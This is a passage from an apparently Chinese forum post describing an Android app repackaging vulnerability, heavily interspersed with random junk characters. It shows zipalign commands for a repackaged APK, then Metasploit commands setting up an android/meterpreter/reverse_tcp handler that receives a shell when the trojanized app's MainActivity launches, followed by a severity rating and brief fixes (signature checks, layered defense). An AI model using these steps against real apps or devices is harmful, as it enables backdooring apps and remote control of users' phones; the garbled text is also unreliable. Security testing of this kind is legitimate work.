" ]8 t/ N* g0 G/ k" V3 | 0 Y' @4 B P2 f( y 字节对齐优化 ; J% X+ N$ H, H/ r ' {1 P$ s$ D2 E+ h& e5 p/ z

6 E9 H- D2 M; ~1 _5 }3 p" E: e% z % n" k$ |0 m: [, }4 J% { zipalign -v 4 repackaged.apk final.apk / l9 O) i. m7 M - R& E' X; V4 A* d, p0 l

) n4 N/ m' ^; p- c ' f$ ` l, ]* d9 ], @/ b3 J+ |6 X 检查是否对齐 ( u* G. r7 D m* R+ y F( P2 w $ U) I, m. w0 F6 \! m% I

! b. [0 A2 e2 ?9 i1 X- b0 [# Y( x" y/ @4 |3 k zipalign -c -v 4 final.apk ; u( ?' Z% v: ]/ M7 N 6 R+ r+ E" l3 g) d$ \( T& L

% K( U( c2 m9 M% a1 Y 8 [+ F1 ^. @0 n$ h: @ 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 ( K8 B5 s a& k( O5 L/ Y 5 i6 R |0 s5 B- B( h. [

3 q0 T8 O5 i4 S( }, z) g- o& L 9 Y }1 o2 W) J/ {5 d2 B8 R 启动Metasploit控制台，配置参数等待上线 * M% K9 B, E/ d" h' Q& u8 D7 K! J% }* i6 F! y: i$ B7 ^

% Q. A2 K5 r% B" s! O- @ & B2 W. t4 M; E7 D; ~/ Y' l& C 在终端依次输入如下命令 2 O8 _+ `; u7 s! @% u. Y # c. l3 l" E i0 q

. |4 Z/ j5 N% I9 O% A' _ & f2 _* B3 W7 C- h) e msfconsole 0 h! _3 o p! w9 U( b 0 L# c; `0 G4 `4 ^; L

9 q8 c6 T' O7 _! x & L6 C# V q; y W9 D. `6 h use exploit/multi/handler / N0 G# a& a% L " Y9 H6 i" H4 f- [! _2 x

) ^4 ~' [# `9 O% M- k ( U- L* H" F$ X6 E3 m3 x set PAYLOAD android/meterpreter/reverse_tcp " K7 Z2 W' R& @2 \3 D) ?, v& e0 S7 C- E , l3 ] Y& C. N: l8 r! Z

' C/ ?1 J1 L$ }) P3 T 7 Z4 E( J) z; ^2 d9 g set LHOST 192.xxx.xx.xx & @( e. [1 k1 q" k* F& l 2 Z( `5 q! x' p e

) o4 N8 K0 M2 t) F . I& `3 g0 ^, N/ i1 X set LPORT 4444 / h3 p# `& B$ _( W, \" r. r; J$ ? & x+ Q, n6 e6 d: B3 Q- Q

* P0 i$ x0 X# v; G- v8 b ! d) A- x7 K$ s0 n9 C exploit , H) z# v+ Q+ i) G4 h! a 1 L8 U7 m4 w; P; C4 z* v6 B

. G- ~$ }3 j( |6 c) o( y % K+ i, F8 ]0 T$ R9 ]7 L 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： 1 ?- V5 d+ G( P# ] # B; Z% d# j7 b' O

& ]2 E/ ]% c7 E* C2 H/ g# q# M6 E' } l& O/ ?2 e 漏洞危害：中 7 T6 ]" [& a u; T. d7 v) s# |2 p8 ]- d; J% U- @

& S6 N5 W N5 [ l, {) M2 x! x3 k3 {. T4 F( M- \|' ^ 8 L7 \3 H7 c' W! ^4 K' r8 s 3 Q! d W9 [' t1 f- T9 U 严重程度 8 }# I+ m( T& i# V4 Q* z! g - X: H" j5 ~ W $ r# d! l6 s4 Y8 ? f ' l9 y& f4 _0 ]( q	/ ~2 Q# I- l0 \7 f . Y* m5 ~4 i; K5 V: b" {! B1 P 9 V9 t. d d: G8 t3 E / v. _5 w& \|8 A+ Q5 L" \|4 W3 ~ 高 9 q/ d0 V+ S w6 K/ y- g! M4 G; m8 X 0 H0 W$ K; S5 D8 o 4 u+ S4 z( E, M3 t" n7 \6 ]4 u& I) r 0 k% n$ p% d- j. ^- O) y. h	: Z: ] S8 u. \; O" P7 H, g8 O & r, X- b& j6 P2 y% H9 e g / i( R/ P1 {3 m0 v$ I4 v1 }" ~ - n- }7 i9 ~8 D! w ■ 3 O) a" r0 o+ R G1 L: e5 b5 h4 ^+ m 8 M. y- g0 [4 I8 `. S* ?3 {: c ! I8 T5 A/ ~2 P* y	1 q; m& {, Z+ d) R) W9 G% j; T- a2 K4 e* _: d2 d3 I2 \' E % N) K+ U. V0 p0 I ' l6 e+ z6 z D! n9 d! q 中 / V$ T$ W, B& q- ~ 4 u( X) S" z4 h3 U% r- v% F & ~7 Z3 R5 k* E$ G1 K% d* f, X+ Z) L! w+ N. \|5 u( i	, ^8 w6 }- [9 e4 u , s0 i3 W' \9 c ' P) k5 w( I- n- Y+ K: A Z) e# T" r9 {3 y* K : M B2 p8 D; T. L% q/ R# D 6 {* ?5 k: J( a3 O: W N% Y3 @+ W' o) Q! G9 W& e6 o* a; j% o, n5 t5 a; u- T" \ ! m' `2 j' K0 w0 e; L" f M 9 W0 O# v }! i& p1 ]. F, m	9 m* l1 h4 E: x- U ' e$ F* d7 x8 \| Y' g 0 U; o$ J- T* z : X/ X( o3 E+ Y+ n0 d 低 8 ]6 G- s& b3 l& K1 }# I2 B: \4 l; e$ W " x9 u1 n' I/ v& \ % f, a' R7 F P. y: k5 y; Q	9 y3 p6 }/ \* ?) E 1 p" {; \& _% F8 ?4 s2 L8 A% n) R : l4 r+ A, @& x& s% V% z ; j1 @8 q. u7 E9 Q 4 ?) Q! S4 h! T% H2 p/ o 9 u) T! e3 d z. q1 T # ^! x% ]3 {# w" u+ b+ W ~: h: q r ^" f$ b: s# C 7 r8 o( E4 @/ K q1 n9 o; e5 f/ `; j$ m5 C

2 q; b* T: q, e+ I $ ?. Y% q+ w U6 o% J 6 p! {& q% s2 N1 ^. s . I, ] X" j D0 X* y

+ H$ _* I) r0 {' F" x! h6 ?* E- p& ^$ ?, b& b 修复方法： . I/ l& E4 J# M% K& l" y- C4 B. s% f m" B& |" W2 r

7 E2 q7 r- W" n! E( O" A: n . l3 Z" [5 y& m0 n 1.在 APP 启动时应做签名校验防止二次打包。
c" n7 [ P) _' {& x* z6 p# w * s5 ]1 }1 Z' h# u- Q, k- b 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 9 l, q: C% k; B1 u2 g ^ o7 p4 g- _! S0 L. ~' D V# k

/ g8 ]9 Z; v& s( G2 E8 B # D' r/ _" N) T W* V! I * g& b2 s4 e. G5 y9 b9 s, y, b. k# f j6 F" A/ k

3 i1 W7 P3 A/ }1 f2 @ ( Q8 D1 W! r) L2 Y, t$ g
* R# v4 \8 \7 a. A9 X [' Q( [

		自动登录	找回密码
密码			立即注册